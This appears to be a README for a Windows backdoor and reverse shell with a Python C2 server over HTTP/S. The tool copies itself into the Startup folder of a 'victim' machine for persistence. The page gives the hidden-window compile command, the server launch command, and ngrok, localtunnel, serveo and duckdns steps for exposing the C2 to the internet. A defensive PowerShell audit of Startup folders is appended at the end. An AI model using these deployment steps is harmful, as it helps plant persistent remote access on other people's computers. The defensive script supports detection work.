A simple, persistent Windows toy backdoor/reverse shell that uses HTTP/S to communicate with the C2 server.
Once the victim starts the executable, it places itself in the default Startup programs directory and then tries to establish a connection.
Edit line 6 with your own reachable domain or public IP address, then compile:
```
gcc barbie.c -o startupsrvc -w -mwindows
```
Start your server with:
```
python3 server.py
```
This runs the server locally on port 5001; feel free to change that.
To use a self-signed TLS certificate, add `ssl_context="adhoc"` to the last line of the code. This may cause problems if you use the tunneling services mentioned below.
To avoid code page mismatches, the raw data sent by the client is decoded as UTF-8.
See this link for the right encoding for your country.
Now you have to expose your localhost to the internet. There are various ways to do this:
- Set up port forwarding by opening the chosen port for your PC on your modem/router (unless you're behind a Carrier-grade NAT).
- Use a reverse proxy to start an HTTPS tunnel:
  - Ngrok:
    ```
    ngrok http 5001
    ```
  - Localtunnel:
    ```
    lt --port 5001 --subdomain <choose a name>
    ```
  - Serveo through SSH:
    ```
    ssh -R <choose a name>.serveo.net:80:localhost:5001 serveo.net
    ```
These services automatically generate TLS certificates.
Obviously you want your subdomain to last longer:
- For ngrok, see this guide.
- For serveo and localtunnel, just choose a name that nobody would guess.
If you're not using a tunneling service, you could try duckdns.
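As an added defensive counterpart (not part of this project), the PowerShell audit below enumerates the per-user and all-users Startup folders that the executable above installs itself into, resolves shortcuts to their targets, and flags entries that are unsigned or were modified recently. The `$RecentDays` threshold and the `Suspicious` heuristic are assumptions, not anything the project defines.

```powershell
# Added example: audit Windows Startup folders for unsigned or recently added entries.
# Run as the user whose profile you want to inspect (the all-users folder is also checked).
param([int]$RecentDays = 7)   # assumed threshold for "recently modified"

$startupDirs = @(
    (Join-Path $env:APPDATA     'Microsoft\Windows\Start Menu\Programs\Startup'),
    (Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\StartUp')
)
$cutoff = (Get-Date).AddDays(-$RecentDays)
$shell  = New-Object -ComObject WScript.Shell

$results = foreach ($dir in $startupDirs) {
    if (-not (Test-Path -LiteralPath $dir)) { continue }
    # -Force includes hidden files, which a dropped binary may be marked as
    Get-ChildItem -LiteralPath $dir -File -Force | ForEach-Object {
        $item   = $_
        $target = $item.FullName
        # .lnk shortcuts point at the binary that actually runs at logon
        if ($item.Extension -ieq '.lnk') {
            $target = $shell.CreateShortcut($item.FullName).TargetPath
        }
        $sigStatus = if ($target -and (Test-Path -LiteralPath $target)) {
            (Get-AuthenticodeSignature -FilePath $target).Status   # e.g. Valid, NotSigned
        } else {
            'TargetMissing'
        }
        [pscustomobject]@{
            Entry      = $item.FullName
            Target     = $target
            Signature  = $sigStatus
            Modified   = $item.LastWriteTime
            Suspicious = ($sigStatus -ne 'Valid') -or ($item.LastWriteTime -gt $cutoff)
        }
    }
}

# Suspicious entries first; an unsigned, freshly written executable such as
# startupsrvc.exe would appear at the top of this list.
$results | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Scheduled tasks, Run/RunOnce registry keys and services are other persistence locations this script deliberately does not cover; it is scoped to the Startup-folder mechanism described on this page.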